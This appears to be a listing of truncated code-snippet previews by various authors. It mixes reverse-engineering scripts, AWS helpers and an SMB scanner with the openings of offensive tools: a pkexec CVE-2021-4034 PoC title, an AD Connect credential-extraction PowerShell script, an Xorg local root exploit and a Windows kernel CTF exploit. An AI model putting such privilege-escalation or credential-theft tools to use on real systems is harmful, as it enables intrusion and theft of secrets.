NyaMisty

"""
summary: drawing custom graphs
description:
  Showing custom graphs, using `ida_graph.GraphViewer`. In addition,
  show how to write actions that can be performed on those.
keywords: graph, actions
"""

from __future__ import print_function
# -----------------------------------------------------------------------

smx-smx

CVE-2021-4034 (pkexec) self contained exploit PoC

iann0036

route53domains:RegisterDomain
route53domains:RenewDomain
route53domains:TransferDomain
ec2:ModifyReservedInstances
ec2:PurchaseHostReservation
ec2:PurchaseReservedInstancesOffering
ec2:PurchaseScheduledInstances
rds:PurchaseReservedDBInstancesOffering
dynamodb:PurchaseReservedCapacityOfferings
s3:PutObjectRetention

cetfor

#Checks system calls for command injection patterns
#@author 
#@category HackOvert
#@keybinding 
#@menupath 
#@toolbar 

from ghidra.app.decompiler import DecompileOptions
from ghidra.app.decompiler import DecompInterface
from ghidra.program.model.pcode import Varnode

xpn

Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync"

try {
    $client.Open()
} catch {
    Write-Host "[!] Could not connect to localdb..."
    return

nikallass

#!/bin/bash
if [ $# -eq 0 ]
  then
    echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR'
    exit 1
fi

echo "Checking if there's SMB v3.11 in" $1 "..."

nmap -p445 --script smb-protocols -Pn -n $1 | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | replace 'Nmap scan report for' '@' | tr "@" "\n" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP '\d+\.\d+\.\d+\.\d+'

sobi3ch

# general
alias aws.whoami='aws iam get-user --query User.Arn --output text'
alias az.whoami='az ad signed-in-user show --query userPrincipalName --output tsv'

# In ~/.aws/credencials|config leave [default] profile empty and name it each one of it so `aws-env -l` can list all of them
# aws.profile # show current profile
# aws.profile profile-name # set profile name
# Double tab completion works
aws.profile ()
{

cetfor

from ghidra.app.emulator import EmulatorHelper
from ghidra.program.model.symbol import SymbolUtilities

# Tested with Ghidra v9.1 and v9.1.1, future releases are likely to simplify
# and/or expand the EmulatorHelper class in the API.

# == Helper functions ======================================================
def getAddress(offset):
    return currentProgram.getAddressFactory().getDefaultAddressSpace().getAddress(offset)

0x27

#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector. 
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c

j00ru

// WCTF 2018 "searchme" task exploit
//
// Author:    Mateusz "j00ru" Jurczyk
// Date:      6 July 2018
// Tested on: Windows 10 1803 (10.0.17134.165)
//
// See also:  https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/
#include <Windows.h>
#include <winternl.h>
#include <ntstatus.h>